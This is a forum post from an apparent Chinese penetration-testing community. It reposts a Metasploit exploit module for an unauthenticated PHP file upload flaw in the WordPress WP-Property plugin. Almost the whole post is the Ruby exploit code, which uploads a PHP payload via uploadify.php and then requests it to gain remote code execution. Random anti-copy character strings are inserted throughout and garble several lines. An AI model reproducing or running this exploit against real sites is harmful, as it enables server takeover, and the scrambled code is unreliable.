找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2690|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
; Y& c: O+ t3 q" p' _  \1 o3 T/ ]8 m5 C+ l3 D. @
## # This file is part of the Metasploit Framework and may be subject to
5 N  k& |+ W5 X, [& K/ M5 K. Z8 o5 E
# redistribution and commercial restrictions. Please see the Metasploit9 ?/ O: t3 h9 I
: a, u3 T3 t1 r! R  T
# Framework web site for more information on licensing and terms of use.$ W+ a1 p1 ~( V4 B& g
8 v2 D3 Z) S( |
#   http://metasploit.com/framework/ ##
( M0 A( v/ a9 z6 Y; q5 D* V, ?& E; a8 o; }" k; `

8 H; i" |. R) `, D
+ ]5 a. Y' }. a/ D
. C! z! K7 K/ u9 d, q! O4 R1 H) Q
; H8 m% n5 ]* R1 x' Krequire 'msf/core', A  U# K; t3 A9 U, G$ ~! b
require 'msf/core/exploit/php_exe'
0 N+ x" G- Y4 L5 e6 ]+ p
( b, n0 y. N2 P) G; G- Xclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',: e% @, C1 N- p8 L3 i
'Description'    => %q{  v+ z! I. i+ D! M+ Q1 e0 w
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
2 m/ q8 Y2 r0 Z  b# h) Z[& B1 r+ g  ]$ n% j7 ^6 [) f! e0 i4 d3 `
'Sammy FORGIT', # initial discovery
& C1 p: @4 f. ?- C' m$ P* Z! N'James Fitts <fitts.james[at]gmail.com>' # metasploit module
- j. ]/ b( x5 N- m- h  A# ]],
( X! p: |7 D9 D. k'License'        => MSF_LICENSE,
2 P/ Z3 [  A5 v% p1 a5 {2 ~'References'     =>
% J( m7 ~+ A) D; M3 y/ D[( k, G0 q8 G! N; X+ k; b
[ 'OSVDB', '82656' ],
+ E2 J4 n8 X( c[ 'BID', '53787' ],
; t! f; ?" Q- R[ 'EDB', '18987'],
. O( u* W. K) o% c) P% [[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]" K# L* v( B! V, ~$ K# t% {
],/ u5 H# _$ m1 k, b/ Q
'Payload'        =>
5 U/ X& }( I7 M2 s1 J9 f{2 I7 s% R2 v6 W2 a$ K
'BadChars' => "\x00",9 {- v4 Y) B0 ]
}," m! z3 K9 E9 K  c( V) t
'Platform'       => 'php',! p# r6 Q! w- d
'Arch'           => ARCH_PHP,, T9 x. a& q7 }9 T2 K$ J
'Targets'        =>
& e* d3 ?/ o1 t& L[$ d+ O. \9 ]/ j
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],+ ]9 v0 e3 L4 [- K7 R) G
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]; I( w5 M. Y/ Y- W. K; z
],1 J; n/ X4 ]6 G4 w; |  Q
'DefaultTarget'  => 0,
  a7 S9 j' x2 ?' t'DisclosureDate' => 'Mar 26 2012'))
5 j; ^; W& X7 V3 O4 B5 }7 t! C7 {, r/ I. `# d
register_options(
/ ^( f' F: L, `! i[
+ d' z& M0 j4 a6 r' S' `OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
: u, T; R6 I4 z2 O], self.class)
+ s% T* b3 P( w8 v- Jend
  K3 c4 @: F- C3 L0 \; w2 ^" q4 E# H! B& p) ~
def check
4 X+ C: M1 N( B3 O& `) `uri =  target_uri.path; T, z4 o8 ?. j
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',9 u: j2 o2 N3 M. C7 H4 s
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"% |) V! {. G) b  s3 L0 ~
})$ H: L0 [0 F! J  F: h, H" }8 T

7 a$ O" T% f( E- @% }& w: Eif not res or res.code != 200, y" x! z* b' L- F9 K  b$ }
return Exploit::CheckCode::Unknown% D2 S0 ~" X* g- j1 L# I
end/ U6 X  D6 h8 m& a
6 n- L% g5 t% F9 p: Y$ h, \$ }
return Exploit::CheckCode::Appears1 o8 H7 k# T, m+ o2 a
end
7 n: ^' v/ N* M. C, p6 g, t8 [' v+ ^) N
def exploit
1 Y$ O- F' C) D1 Y" ^( duri =  target_uri.path9 _, i" x  _$ Q; D% w: n6 [& h3 Q2 y
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)& L# R: Y& Z. _" U6 Q

( H5 T1 @* y% @' k$ [, v' `data = Rex::MIME::Message.new3 g: f; ]+ L! Z5 K- d
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")! _5 q9 L2 p$ r( S
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
: u9 ^1 H7 h( |: @post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 j7 {! J: Q; D

$ ]# |3 k1 q# O$ B+ D0 G! wprint_status("#{peer} - Uploading payload #{@payload_name}")
5 s2 \. W: T, z4 Ires = send_request_cgi({5 l- H1 a2 [/ V  T! {" V: V
'method' => 'POST',/ a4 R( h" ~) p7 z
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
. i2 k' G& r( Q4 g) V" t$ ]/ z7 b'ctype'  => "multipart/form-data; boundary=#{data.bound}",
/ A: f& \$ R, F) x7 E3 @( e- ?% C'data'   => post_data
- ?( H# ?' j+ _/ a" B4 m  O}); `. d. }' _, N3 Y% }8 t$ f
" i8 E. m& y6 P$ E/ n* n
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
( t2 R  G7 v/ @% U2 P+ vfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 s0 `6 _/ W- ]4 B( O5 m- Uend+ R2 Z! Y  f  w3 t) t% c9 C

4 z0 p* L/ q3 S/ T. Aupload_uri = res.body0 E9 }" o$ m* D. ]! @  n

: M' x0 A5 l$ Z. V; z! y, rprint_status("#{peer} - Executing payload #{@payload_name}")
( Y) y8 `. h. G' u# @res = send_request_raw({+ `8 {  f$ a/ }3 s$ @: o
'uri'    => upload_uri,
# H* T9 E8 n1 R9 T( s'method' => 'GET'( J5 }: v4 `* S/ H
})
- e' k- \6 E9 U6 nend
$ ]- S. H, q& o/ P! Wend
1 v' Z  D7 f! O5 k  y/ M2 g& }  f0 ]% }' w. S; q, ~- q
不要问我这写的是什么 怎么利用 我是说msf./ q1 W2 b* T+ y, f  _

$ o/ B  a! Q2 n, I; Q- e6 X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表